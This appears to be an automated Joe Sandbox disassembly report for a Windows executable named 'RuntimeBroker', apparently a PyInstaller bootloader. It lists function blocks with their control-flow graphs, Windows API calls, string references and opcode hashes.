                                                                                                                                                                                • Instruction ID: 866b8e1216ac7c22f96000f58ce65c0b198d16ce94fe039142eb47ad575d0073
                                                                                                                                                                                • Opcode Fuzzy Hash: 11860e683bfeec2df00dcc2c56da5dbb6591d5702bb717516bbb2bb41ff9b0e3
                                                                                                                                                                                • Instruction Fuzzy Hash: D6418C61B0964244EA36FB299D912F9D291FF89780FC40135DD0D57BB6EE3CF5009B60

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 546 7ff72b06ad6c-7ff72b06ad92 547 7ff72b06adad-7ff72b06adb1 546->547 548 7ff72b06ad94-7ff72b06ada8 call 7ff72b0643d4 call 7ff72b0643f4 546->548 550 7ff72b06b187-7ff72b06b193 call 7ff72b0643d4 call 7ff72b0643f4 547->550 551 7ff72b06adb7-7ff72b06adbe 547->551 566 7ff72b06b19e 548->566 568 7ff72b06b199 call 7ff72b069bf0 550->568 551->550 554 7ff72b06adc4-7ff72b06adf2 551->554 554->550 555 7ff72b06adf8-7ff72b06adff 554->555 558 7ff72b06ae18-7ff72b06ae1b 555->558 559 7ff72b06ae01-7ff72b06ae13 call 7ff72b0643d4 call 7ff72b0643f4 555->559 564 7ff72b06b183-7ff72b06b185 558->564 565 7ff72b06ae21-7ff72b06ae27 558->565 559->568 569 7ff72b06b1a1-7ff72b06b1b8 564->569 565->564 570 7ff72b06ae2d-7ff72b06ae30 565->570 566->569 568->566 570->559 573 7ff72b06ae32-7ff72b06ae57 570->573 575 7ff72b06ae59-7ff72b06ae5b 573->575 576 7ff72b06ae8a-7ff72b06ae91 573->576 579 7ff72b06ae5d-7ff72b06ae64 575->579 580 7ff72b06ae82-7ff72b06ae88 575->580 577 7ff72b06ae66-7ff72b06ae7d call 7ff72b0643d4 call 7ff72b0643f4 call 7ff72b069bf0 576->577 578 7ff72b06ae93-7ff72b06aebb call 7ff72b06c90c call 7ff72b069c58 * 2 576->578 607 7ff72b06b010 577->607 609 7ff72b06aebd-7ff72b06aed3 call 7ff72b0643f4 call 7ff72b0643d4 578->609 610 7ff72b06aed8-7ff72b06af03 call 7ff72b06b594 578->610 579->577 579->580 581 7ff72b06af08-7ff72b06af1f 580->581 584 7ff72b06af9a-7ff72b06afa4 call 7ff72b072c2c 581->584 585 7ff72b06af21-7ff72b06af29 581->585 596 7ff72b06b02e 584->596 597 7ff72b06afaa-7ff72b06afbf 584->597 585->584 588 7ff72b06af2b-7ff72b06af2d 585->588 588->584 594 7ff72b06af2f-7ff72b06af45 588->594 594->584 599 7ff72b06af47-7ff72b06af53 594->599 605 7ff72b06b033-7ff72b06b053 ReadFile 596->605 597->596 601 7ff72b06afc1-7ff72b06afd3 GetConsoleMode 597->601 599->584 603 7ff72b06af55-7ff72b06af57 599->603 601->596 606 7ff72b06afd5-7ff72b06afdd 601->606 603->584 608 7ff72b06af59-7ff72b06af71 603->608 611 7ff72b06b14d-7ff72b06b156 GetLastError 605->611 612 7ff72b06b059-7ff72b06b061 605->612 606->605 615 7ff72b06afdf-7ff72b06b001 ReadConsoleW 606->615 618 7ff72b06b013-7ff72b06b01d call 7ff72b069c58 607->618 608->584 619 7ff72b06af73-7ff72b06af7f 608->619 609->607 610->581 616 7ff72b06b158-7ff72b06b16e call 7ff72b0643f4 call 7ff72b0643d4 611->616 617 7ff72b06b173-7ff72b06b176 611->617 612->611 613 7ff72b06b067 612->613 621 7ff72b06b06e-7ff72b06b083 613->621 623 7ff72b06b003 GetLastError 615->623 624 7ff72b06b022-7ff72b06b02c 615->624 616->607 628 7ff72b06b17c-7ff72b06b17e 617->628 629 7ff72b06b009-7ff72b06b00b call 7ff72b064368 617->629 618->569 619->584 627 7ff72b06af81-7ff72b06af83 619->627 621->618 631 7ff72b06b085-7ff72b06b090 621->631 623->629 624->621 627->584 635 7ff72b06af85-7ff72b06af95 627->635 628->618 629->607 638 7ff72b06b0b7-7ff72b06b0bf 631->638 639 7ff72b06b092-7ff72b06b0ab call 7ff72b06a984 631->639 635->584 642 7ff72b06b13b-7ff72b06b148 call 7ff72b06a7c4 638->642 643 7ff72b06b0c1-7ff72b06b0d3 638->643 646 7ff72b06b0b0-7ff72b06b0b2 639->646 642->646 647 7ff72b06b12e-7ff72b06b136 643->647 648 7ff72b06b0d5 643->648 646->618 647->618 650 7ff72b06b0da-7ff72b06b0e1 648->650 651 7ff72b06b11d-7ff72b06b128 650->651 652 7ff72b06b0e3-7ff72b06b0e7 650->652 651->647 653 7ff72b06b0e9-7ff72b06b0f0 652->653 654 7ff72b06b103 652->654 653->654 655 7ff72b06b0f2-7ff72b06b0f6 653->655 656 7ff72b06b109-7ff72b06b119 654->656 655->654 658 7ff72b06b0f8-7ff72b06b101 655->658 656->650 657 7ff72b06b11b 656->657 657->647 658->656
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                • Opcode ID: 68a47ba86f230bb5d63a3bd262fc543bc7d5861b4e9f61d57eff9af495398285
                                                                                                                                                                                • Instruction ID: c05628facd73e5f65f9d56ef1470d49cacb86d7f1aecf9c9d039b9a41bce306e
                                                                                                                                                                                • Opcode Fuzzy Hash: 68a47ba86f230bb5d63a3bd262fc543bc7d5861b4e9f61d57eff9af495398285
                                                                                                                                                                                • Instruction Fuzzy Hash: C0C1F462F0C68651E672BB1D98413BEBB90FB98B80FD90139DA5D077B1CE7CE4558B20

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 995526605-0
                                                                                                                                                                                • Opcode ID: 748b97fd960fc4e5004671791fa0bd5d217265360f36ca399a643c65045a3ab9
                                                                                                                                                                                • Instruction ID: c9caa850fbb6db86d4d85963d6896311a1b9c58241e0d985abbae8873a59b300
                                                                                                                                                                                • Opcode Fuzzy Hash: 748b97fd960fc4e5004671791fa0bd5d217265360f36ca399a643c65045a3ab9
                                                                                                                                                                                • Instruction Fuzzy Hash: 77215331A0CA4242EB31AB59A89423AE7A1FF857E4F900235DA6D43AF5DF7CE4449B10

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,00007FF72B053534), ref: 00007FF72B053411
                                                                                                                                                                                  • Part of subcall function 00007FF72B0529E0: GetLastError.KERNEL32(?,?,?,00007FF72B05342E,?,00007FF72B053534), ref: 00007FF72B052A14
                                                                                                                                                                                  • Part of subcall function 00007FF72B0529E0: FormatMessageW.KERNEL32(?,?,?,00007FF72B05342E), ref: 00007FF72B052A7D
                                                                                                                                                                                  • Part of subcall function 00007FF72B0529E0: MessageBoxW.USER32 ref: 00007FF72B052ACF
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Message$ErrorFileFormatLastModuleName
                                                                                                                                                                                • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                • API String ID: 517058245-2863816727
                                                                                                                                                                                • Opcode ID: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                                                                                                                • Instruction ID: 815b5bee0a0bd1a792fd4d617f62d4ac7f45312321708e4e32c9fc018b95912e
                                                                                                                                                                                • Opcode Fuzzy Hash: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                                                                                                                • Instruction Fuzzy Hash: A5212C61B1864691FA32BB28EC913B9D350FF49394FC04136D69E869F5EE2CF5058F20

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,00007FF72B0539F2), ref: 00007FF72B05821D
                                                                                                                                                                                • K32EnumProcessModules.KERNEL32(?,00000000,?,00007FF72B0539F2), ref: 00007FF72B05827A
                                                                                                                                                                                  • Part of subcall function 00007FF72B0586B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF72B053FA4,00000000,00007FF72B051925), ref: 00007FF72B0586E9
                                                                                                                                                                                • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF72B0539F2), ref: 00007FF72B058305
                                                                                                                                                                                • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF72B0539F2), ref: 00007FF72B058364
                                                                                                                                                                                • FreeLibrary.KERNEL32(?,00000000,?,00007FF72B0539F2), ref: 00007FF72B058375
                                                                                                                                                                                • FreeLibrary.KERNEL32(?,00000000,?,00007FF72B0539F2), ref: 00007FF72B05838A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3462794448-0
                                                                                                                                                                                • Opcode ID: 4551d765799ef9b75e00c942335cefe8825730a2f7f2510c4597a22c5cf53bdc
                                                                                                                                                                                • Instruction ID: cac5786549ca903f74ed64aa25f920d8e82d03e6fc1201d8e18ba49ae5b43b79
                                                                                                                                                                                • Opcode Fuzzy Hash: 4551d765799ef9b75e00c942335cefe8825730a2f7f2510c4597a22c5cf53bdc
                                                                                                                                                                                • Instruction Fuzzy Hash: 3A41B372A1978641EB31AF19A8802BAB394FF84B84F844035DF9C57BA9DE3CE401CF14

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00007FF72B057B50: GetCurrentProcess.KERNEL32 ref: 00007FF72B057B70
                                                                                                                                                                                  • Part of subcall function 00007FF72B057B50: OpenProcessToken.ADVAPI32 ref: 00007FF72B057B83
                                                                                                                                                                                  • Part of subcall function 00007FF72B057B50: GetTokenInformation.KERNELBASE ref: 00007FF72B057BA8
                                                                                                                                                                                  • Part of subcall function 00007FF72B057B50: GetLastError.KERNEL32 ref: 00007FF72B057BB2
                                                                                                                                                                                  • Part of subcall function 00007FF72B057B50: GetTokenInformation.KERNELBASE ref: 00007FF72B057BF2
                                                                                                                                                                                  • Part of subcall function 00007FF72B057B50: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF72B057C0E
                                                                                                                                                                                  • Part of subcall function 00007FF72B057B50: CloseHandle.KERNEL32 ref: 00007FF72B057C26
                                                                                                                                                                                • LocalFree.KERNEL32(?,00007FF72B053814), ref: 00007FF72B05848C
                                                                                                                                                                                • LocalFree.KERNEL32(?,00007FF72B053814), ref: 00007FF72B058495
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                • API String ID: 6828938-1529539262
                                                                                                                                                                                • Opcode ID: 3b4c49a148c6d93be49ada6c8446d085e6d181d97aae771454943d90599d7390
                                                                                                                                                                                • Instruction ID: ba575d771b70e856a571d81c72c269d89e6245f365fd0fd7f31ccbc91f0e098f
                                                                                                                                                                                • Opcode Fuzzy Hash: 3b4c49a148c6d93be49ada6c8446d085e6d181d97aae771454943d90599d7390
                                                                                                                                                                                • Instruction Fuzzy Hash: F2212B61A0864681F662BB18EC553FAA2A0FB88780FC44435EA4D53BA6DE3CE545CB60

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                • String ID: Error/warning (ANSI fallback)$Warning
                                                                                                                                                                                • API String ID: 1878133881-2698358428
                                                                                                                                                                                • Opcode ID: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                                                                                                                                                • Instruction ID: 6fdff204d2bd53b1c08c4d5f8845a223bb5b3ed99a58e59af63a3c8d35ed5717
                                                                                                                                                                                • Opcode Fuzzy Hash: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                                                                                                                                                • Instruction Fuzzy Hash: 06119072628B8581FB32AB04F865BA9B364FF48784FD05135DA8D47A64DF3CD604CB50
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72B06C25B), ref: 00007FF72B06C38C
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72B06C25B), ref: 00007FF72B06C417
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ConsoleErrorLastMode
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 953036326-0
                                                                                                                                                                                • Opcode ID: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
                                                                                                                                                                                • Instruction ID: e41ac4792b681674c8542f6d936e68fe1e6478a3726100afa7ef545ad91e4126
                                                                                                                                                                                • Opcode Fuzzy Hash: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
                                                                                                                                                                                • Instruction Fuzzy Hash: 9E91B662B0865185F772EF6D9C4037DA7A0FB58B88F94413DDE0E57AA5DE3CD4818B20
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1279662727-0
                                                                                                                                                                                • Opcode ID: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
                                                                                                                                                                                • Instruction ID: c7dfdb86f8e7b35c32b853fdb9aa5c213066ecb37e5093cdda27ef89ebd06a0e
                                                                                                                                                                                • Opcode Fuzzy Hash: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
                                                                                                                                                                                • Instruction Fuzzy Hash: D341C532E1878143E365AB25995037DA260FF98764F549338D65C43AE9DF7CA1E08B20
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3251591375-0
                                                                                                                                                                                • Opcode ID: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                                                                                                                • Instruction ID: 9e72c2b248a69c027bca582dbd90e284560123b00cf7dd4417d90ab532dc5979
                                                                                                                                                                                • Opcode Fuzzy Hash: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                                                                                                                • Instruction Fuzzy Hash: 40311A11A0864241FA76BB6C9CA53B99281FF45788FD41039EA0E47AF3DE2CF9458F35
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1703294689-0
                                                                                                                                                                                • Opcode ID: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                                                                                                                • Instruction ID: 4c7431cefc51d2c3c4bc47c3569015e8213f3c240b820131c7022439265ddbcd
                                                                                                                                                                                • Opcode Fuzzy Hash: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                                                                                                                • Instruction Fuzzy Hash: 1ED06710B1970687EA7A3B785C691799351AF9C741F90143DD84A0A3B3DD2CA8495E74
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                • Opcode ID: 9ca15b9002a87b72fd1966d073ee072d8ab2af6885046d3198ed673a4b76404c
                                                                                                                                                                                • Instruction ID: b3ce195ae496e00d581070107994c9237756ac34ca31e6f61d1ed744f826caba
                                                                                                                                                                                • Opcode Fuzzy Hash: 9ca15b9002a87b72fd1966d073ee072d8ab2af6885046d3198ed673a4b76404c
                                                                                                                                                                                • Instruction Fuzzy Hash: E551B961B0924245E636BF2D9D8067AE291FF44BA4F944634DE6D47BF5CE3CE4018F20
                                                                                                                                                                                APIs
                                                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF72B069CE5,?,?,00000000,00007FF72B069D9A), ref: 00007FF72B069ED6
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF72B069CE5,?,?,00000000,00007FF72B069D9A), ref: 00007FF72B069EE0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ChangeCloseErrorFindLastNotification
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1687624791-0
                                                                                                                                                                                • Opcode ID: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                                                                                                                                • Instruction ID: 2f4644afd922b1e5157689ef8598afdfcdafe112b50f9db75b69ec44e89d1eca
                                                                                                                                                                                • Opcode Fuzzy Hash: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                                                                                                                                • Instruction Fuzzy Hash: 1721A721F1C64241EE7A7769AD5037D9291DF8C7A0F88423DDA2E47BF6CE6CE5404B20
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
